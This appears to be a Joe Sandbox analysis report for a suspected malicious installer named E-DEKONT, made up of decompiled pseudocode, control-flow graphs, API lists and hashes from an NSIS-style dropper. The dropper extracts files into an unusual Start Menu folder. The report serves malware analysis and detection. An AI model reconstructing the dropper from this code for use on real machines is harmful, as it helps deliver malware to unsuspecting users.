								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E004062A4(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E00406282(_a4, _t44);
			}






























                                                                            0x004062a4
                                                                            0x004062a4
                                                                            0x004062a4
                                                                            0x004062aa
                                                                            0x004062af
                                                                            0x004062c0
                                                                            0x004062c0
                                                                            0x004062c8
                                                                            0x004062c9
                                                                            0x004062ca
                                                                            0x004062cb
                                                                            0x004062ce
                                                                            0x004062d6
                                                                            0x004062d8
                                                                            0x004062f1
                                                                            0x004062f4
                                                                            0x004062f4
                                                                            0x004064f0
                                                                            0x004064f0
                                                                            0x004064f6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406304
                                                                            0x0040630a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406312
                                                                            0x00406313
                                                                            0x00406315
                                                                            0x00406319
                                                                            0x0040631c
                                                                            0x004064dd
                                                                            0x004064eb
                                                                            0x004064ee
                                                                            0x004064ee
                                                                            0x004064df
                                                                            0x004064e2
                                                                            0x004064e5
                                                                            0x004064e7
                                                                            0x004064e7
                                                                            0x00000000
                                                                            0x004064dd
                                                                            0x00406322
                                                                            0x00406325
                                                                            0x00406334
                                                                            0x0040633b
                                                                            0x00406345
                                                                            0x00406349
                                                                            0x0040634c
                                                                            0x0040634f
                                                                            0x00406354
                                                                            0x00406359
                                                                            0x0040635d
                                                                            0x00406360
                                                                            0x00406480
                                                                            0x00406484
                                                                            0x004064b7
                                                                            0x004064bb
                                                                            0x004064c0
                                                                            0x004064c5
                                                                            0x004064c5
                                                                            0x004064ca
                                                                            0x004064cb
                                                                            0x004064d0
                                                                            0x004064d3
                                                                            0x004064d6
                                                                            0x00000000
                                                                            0x004064d6
                                                                            0x00406486
                                                                            0x00406489
                                                                            0x0040648c
                                                                            0x004064a1
                                                                            0x004064a8
                                                                            0x0040648e
                                                                            0x00406495
                                                                            0x00406495
                                                                            0x004064b0
                                                                            0x004064b3
                                                                            0x00406478
                                                                            0x00406479
                                                                            0x00406479
                                                                            0x00000000
                                                                            0x004064b3
                                                                            0x00406366
                                                                            0x0040636e
                                                                            0x00406370
                                                                            0x00406371
                                                                            0x0040638a
                                                                            0x0040638a
                                                                            0x00406391
                                                                            0x00406391
                                                                            0x00406398
                                                                            0x0040639c
                                                                            0x0040639c
                                                                            0x0040639d
                                                                            0x0040639f
                                                                            0x004063da
                                                                            0x004063dd
                                                                            0x004063ed
                                                                            0x004063f0
                                                                            0x004063f8
                                                                            0x004063fe
                                                                            0x004063fe
                                                                            0x0040645b
                                                                            0x0040645b
                                                                            0x0040645d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406402
                                                                            0x00406409
                                                                            0x0040640a
                                                                            0x0040640c
                                                                            0x00406426
                                                                            0x00406434
                                                                            0x0040643a
                                                                            0x0040643c
                                                                            0x00406457
                                                                            0x00406457
                                                                            0x00406457
                                                                            0x00000000
                                                                            0x00406457
                                                                            0x00406442
                                                                            0x0040644d
                                                                            0x00406453
                                                                            0x00406455
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406455
                                                                            0x0040640e
                                                                            0x00406411
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406420
                                                                            0x00406422
                                                                            0x00406424
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406424
                                                                            0x00000000
                                                                            0x0040645b
                                                                            0x004063e5
                                                                            0x00000000
                                                                            0x004063a1
                                                                            0x004063bf
                                                                            0x004063c4
                                                                            0x004063c8
                                                                            0x00406468
                                                                            0x00406468
                                                                            0x0040646b
                                                                            0x00406473
                                                                            0x00406473
                                                                            0x00000000
                                                                            0x0040646b
                                                                            0x004063d0
                                                                            0x0040645f
                                                                            0x0040645f
                                                                            0x00406463
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406465
                                                                            0x00000000
                                                                            0x00406465
                                                                            0x0040639f
                                                                            0x00406373
                                                                            0x00406378
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040637a
                                                                            0x0040637d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040637f
                                                                            0x00406382
                                                                            0x00000000
                                                                            0x00406384
                                                                            0x00406384
                                                                            0x00000000
                                                                            0x00406384
                                                                            0x00406382
                                                                            0x004064fc
                                                                            0x00406507
                                                                            0x00406513
                                                                            0x00406513
                                                                            0x00000000

                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004063F8
                                                                            • SHGetSpecialFolderLocation.SHELL32(0040531D,0041D800,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 00406434
                                                                            • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 00406442
                                                                            • CoTaskMemFree.OLE32(0041D800), ref: 0040644D
                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                                            • lstrlenW.KERNEL32(Call,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004064CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                            • API String ID: 717251189-1230650788
                                                                            • Opcode ID: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                                            • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                                            • Opcode Fuzzy Hash: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                                            • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 833 40176f-401794 call 402c37 call 405bca 838 401796-40179c call 406282 833->838 839 40179e-4017b0 call 406282 call 405b53 lstrcatW 833->839 844 4017b5-4017b6 call 406516 838->844 839->844 848 4017bb-4017bf 844->848 849 4017c1-4017cb call 4065c5 848->849 850 4017f2-4017f5 848->850 857 4017dd-4017ef 849->857 858 4017cd-4017db CompareFileTime 849->858 852 4017f7-4017f8 call 405d4f 850->852 853 4017fd-401819 call 405d74 850->853 852->853 860 40181b-40181e 853->860 861 40188d-4018b6 call 4052e6 call 4030fa 853->861 857->850 858->857 862 401820-40185e call 406282 * 2 call 4062a4 call 406282 call 4058e4 860->862 863 40186f-401879 call 4052e6 860->863 875 4018b8-4018bc 861->875 876 4018be-4018ca SetFileTime 861->876 862->848 897 401864-401865 862->897 873 401882-401888 863->873 877 402ac8 873->877 875->876 879 4018d0-4018db CloseHandle 875->879 876->879 881 402aca-402ace 877->881 882 4018e1-4018e4 879->882 883 402abf-402ac2 879->883 885 4018e6-4018f7 call 4062a4 lstrcatW 882->885 886 4018f9-4018fc call 4062a4 882->886 883->877 890 401901-4022ec 885->890 886->890 895 4022f1-4022f6 890->895 896 4022ec call 4058e4 890->896 895->881 896->895 897->873 898 401867-401868 897->898 898->863
                                                                            C-Code - Quality: 61%
                                                                            			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C37(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405BCA( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405B53(E00406282(_t84, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra\\Sldede")), ??);
				} else {
					E00406282();
				}
				E00406516(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004065C5(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405D4F(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405D74(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004052E6(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E00406282("C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp", _t81);
						E00406282(_t81, _t84);
						E004062A4(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
						E00406282(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp");
						_t64 = E004058E4("C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E004052E6();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004052E6(0xffffffea,  *(_t86 - 8));
				 *0x434fb4 =  *0x434fb4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x30));
				_push( *((intOrPtr*)(_t86 - 0x20)));
				_t45 = E004030FA(); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004062A4(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E004062A4(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E004058E4();
					goto L29;
				}
				goto L33;
			}


















                                                                            0x0040176f
                                                                            0x00401776
                                                                            0x00401782
                                                                            0x00401785
                                                                            0x0040178a
                                                                            0x0040178d
                                                                            0x00401794
                                                                            0x004017b0
                                                                            0x00401796
                                                                            0x00401797
                                                                            0x00401797
                                                                            0x004017b6
                                                                            0x004017bb
                                                                            0x004017bb
                                                                            0x004017bf
                                                                            0x004017c2
                                                                            0x004017c7
                                                                            0x004017c9
                                                                            0x004017cb
                                                                            0x004017d0
                                                                            0x004017d0
                                                                            0x004017db
                                                                            0x004017db
                                                                            0x004017ec
                                                                            0x004017ee
                                                                            0x004017ee
                                                                            0x004017ef
                                                                            0x004017ef
                                                                            0x004017f2
                                                                            0x004017f5
                                                                            0x004017f8
                                                                            0x004017f8
                                                                            0x004017ff
                                                                            0x0040180e
                                                                            0x00401813
                                                                            0x00401816
                                                                            0x00401819
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040181b
                                                                            0x0040181e
                                                                            0x00401874
                                                                            0x00401879
                                                                            0x004015b6
                                                                            0x00402885
                                                                            0x00402885
                                                                            0x00402abf
                                                                            0x00402ac2
                                                                            0x00402ac2
                                                                            0x00000000
                                                                            0x00401820
                                                                            0x00401826
                                                                            0x0040182d
                                                                            0x0040183a
                                                                            0x00401845
                                                                            0x0040185b
                                                                            0x0040185b
                                                                            0x0040185e
                                                                            0x00000000
                                                                            0x00401864
                                                                            0x00401864
                                                                            0x00401865
                                                                            0x00401882
                                                                            0x00402ac8
                                                                            0x00402ac8
                                                                            0x00402ac8
                                                                            0x00401867
                                                                            0x00401867
                                                                            0x00401868
                                                                            0x00401493
                                                                            0x004022f1
                                                                            0x004022f1
                                                                            0x004022f1
                                                                            0x00401865
                                                                            0x0040185e
                                                                            0x00402aca
                                                                            0x00402ace
                                                                            0x00402ace
                                                                            0x00401892
                                                                            0x00401897
                                                                            0x0040189d
                                                                            0x0040189e
                                                                            0x0040189f
                                                                            0x004018a2
                                                                            0x004018a5
                                                                            0x004018aa
                                                                            0x004018b0
                                                                            0x004018b4
                                                                            0x004018b6
                                                                            0x004018be
                                                                            0x004018ca
                                                                            0x004018b8
                                                                            0x004018b8
                                                                            0x004018bc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004018bc
                                                                            0x004018d3
                                                                            0x004018d9
                                                                            0x004018db
                                                                            0x00000000
                                                                            0x004018e1
                                                                            0x004018e1
                                                                            0x004018e4
                                                                            0x004018fc
                                                                            0x004018e6
                                                                            0x004018e9
                                                                            0x004018f2
                                                                            0x004018f2
                                                                            0x00401901
                                                                            0x00401906
                                                                            0x004022ec
                                                                            0x00000000
                                                                            0x004022ec
                                                                            0x00000000

                                                                            APIs
                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede,?,?,00000031), ref: 004017D5
                                                                              • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                              • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                              • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                              • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E), ref: 00405341
                                                                              • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsx82F6.tmp$C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede$Call
                                                                            • API String ID: 1941528284-2657128979
                                                                            • Opcode ID: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                                            • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
                                                                            • Opcode Fuzzy Hash: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                                            • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004030FA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 899 4030fa-403111 900 403113 899->900 901 40311a-403123 899->901 900->901 902 403125 901->902 903 40312c-403131 901->903 902->903 904 403141-40314e call 403315 903->904 905 403133-40313c call 40332b 903->905 909 403303 904->909 910 403154-403158 904->910 905->904 911 403305-403306 909->911 912 4032ae-4032b0 910->912 913 40315e-4031a7 GetTickCount 910->913 914 40330e-403312 911->914 917 4032f0-4032f3 912->917 918 4032b2-4032b5 912->918 915 40330b 913->915 916 4031ad-4031b5 913->916 915->914 920 4031b7 916->920 921 4031ba-4031c8 call 403315 916->921 922 4032f5 917->922 923 4032f8-403301 call 403315 917->923 918->915 919 4032b7 918->919 924 4032ba-4032c0 919->924 920->921 921->909 933 4031ce-4031d7 921->933 922->923 923->909 931 403308 923->931 927 4032c2 924->927 928 4032c4-4032d2 call 403315 924->928 927->928 928->909 936 4032d4-4032d9 call 405e26 928->936 931->915 935 4031dd-4031fd call 4067bd 933->935 941 403203-403216 GetTickCount 935->941 942 4032a6-4032a8 935->942 940 4032de-4032e0 936->940 943 4032e2-4032ec 940->943 944 4032aa-4032ac 940->944 945 403261-403263 941->945 946 403218-403220 941->946 942->911 943->924 949 4032ee 943->949 944->911 947 403265-403269 945->947 948 40329a-40329e 945->948 950 403222-403226 946->950 951 403228-40325e MulDiv wsprintfW call 4052e6 946->951 952 403280-40328b 947->952 953 40326b-403272 call 405e26 947->953 948->916 954 4032a4 948->954 949->915 950->945 950->951 951->945 958 40328e-403292 952->958 959 403277-403279 953->959 954->915 958->935 960 403298 958->960 959->944 961 40327b-40327e 959->961 960->915 961->958
                                                                            C-Code - Quality: 95%
                                                                            			E004030FA(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x41aa00;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E0040332B( *0x434f58 + _t62);
				}
				if(E00403315( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E00403315(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E00403315(0x416a00, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405E26(_a8, 0x416a00, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d364 =  *0x40d364 & 0x00000000;
					 *0x40d360 =  *0x40d360 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce48 = 8;
					 *0x4169f0 = 0x40e9e8;
					 *0x4169ec = 0x40e9e8;
					 *0x4169e8 = 0x4169e8;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403315(0x416a00, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce38 = 0x416a00;
						 *0x40ce3c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce40 = _t95;
							 *0x40ce44 = _v12;
							_t75 = E004067BD(0x40ce38);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce40; // 0x41d800
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E004052E6(0,  &_v152);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce40; // 0x41d800
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405E26(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}


























                                                                            0x00403105
                                                                            0x00403109
                                                                            0x0040310c
                                                                            0x00403111
                                                                            0x00403113
                                                                            0x00403113
                                                                            0x0040311a
                                                                            0x0040311e
                                                                            0x00403123
                                                                            0x00403125
                                                                            0x00403125
                                                                            0x0040312c
                                                                            0x00403131
                                                                            0x0040313c
                                                                            0x0040313c
                                                                            0x0040314e
                                                                            0x00403303
                                                                            0x00403303
                                                                            0x00000000
                                                                            0x00403154
                                                                            0x00403158
                                                                            0x004032b0
                                                                            0x004032f3
                                                                            0x004032f5
                                                                            0x004032f5
                                                                            0x00403301
                                                                            0x00403308
                                                                            0x0040330b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403301
                                                                            0x004032b5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004032b7
                                                                            0x004032ba
                                                                            0x004032bd
                                                                            0x004032c0
                                                                            0x004032c2
                                                                            0x004032c2
                                                                            0x004032d2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004032d9
                                                                            0x004032e0
                                                                            0x004032aa
                                                                            0x004032aa
                                                                            0x00403305
                                                                            0x00403305
                                                                            0x00000000
                                                                            0x00403305
                                                                            0x004032e2
                                                                            0x004032e5
                                                                            0x004032ec
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004032ee
                                                                            0x00000000
                                                                            0x004032ba
                                                                            0x00403164
                                                                            0x00403166
                                                                            0x0040316d
                                                                            0x00403174
                                                                            0x00403174
                                                                            0x0040317b
                                                                            0x00403183
                                                                            0x0040318d
                                                                            0x00403192
                                                                            0x0040319a
                                                                            0x004031a4
                                                                            0x004031a7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004031ad
                                                                            0x004031ad
                                                                            0x004031ad
                                                                            0x004031b5
                                                                            0x004031b7
                                                                            0x004031b7
                                                                            0x004031c8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004031ce
                                                                            0x004031d1
                                                                            0x004031d7
                                                                            0x004031dd
                                                                            0x004031dd
                                                                            0x004031e8
                                                                            0x004031ee
                                                                            0x004031f3
                                                                            0x004031fa
                                                                            0x004031fd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403203
                                                                            0x00403209
                                                                            0x0040320b
                                                                            0x00403214
                                                                            0x00403216
                                                                            0x00403247
                                                                            0x0040324d
                                                                            0x00403259
                                                                            0x0040325e
                                                                            0x0040325e
                                                                            0x00403263
                                                                            0x0040329e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403265
                                                                            0x00403269
                                                                            0x00403280
                                                                            0x00403285
                                                                            0x00403288
                                                                            0x0040328b
                                                                            0x0040328e
                                                                            0x00403292
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403298
                                                                            0x00403272
                                                                            0x00403279
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040327b
                                                                            0x00000000
                                                                            0x0040327b
                                                                            0x00403263
                                                                            0x004032a6
                                                                            0x00000000
                                                                            0x004032a6
                                                                            0x00000000
                                                                            0x004031ad

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
